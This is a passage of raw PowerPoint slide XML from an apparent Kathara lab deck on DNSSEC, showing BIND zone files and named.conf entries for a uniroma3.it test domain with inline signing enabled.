                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL    60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsuni.uniroma3.it.    root.dnsuni.uniroma3.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it.     IN  A   110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1.uniroma3.it.        IN  A   110.0.0.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2.uniroma3.it.        IN  A   110.0.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>router.uniroma3.it.     IN  A   110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre.uniroma3.it. IN  A   110.0.0.50</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www.uniroma3.it.        IN  CNAME uniromatre.uniroma3.it.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7531314-639C-C9C7-F41F-102CF14D4586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2801" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/db.uniroma3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD1151C-7E11-6E1A-8A82-65FF4462CBF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153ECC74-F122-DA64-F24F-3E87DC650973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C0866F9-C5EB-61F6-D26F-1B2346920FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4BB8C1-1617-DF4A-FCF0-7684A0E7B995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="4920435"/>
            <a:ext cx="6116028" cy="1143000"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE25B7A-6825-9FCE-8847-55F64D84832E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAC8040-E002-7272-B478-A67E83247F58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3018" cy="248"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51596323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1D22F6-9194-7277-936F-03AB85A9C343}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988A7B99-C976-A16D-A563-69C9591B001B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1235548"/>
            <a:ext cx="7145435" cy="4025957"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF643F35-433B-50DC-0F8E-8410D2431345}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="969"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone “.” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type hint;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone “uniroma3.it” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/db.uniroma3”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>} </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41061D80-67C3-60E3-3D3D-3A20079433CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3133" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
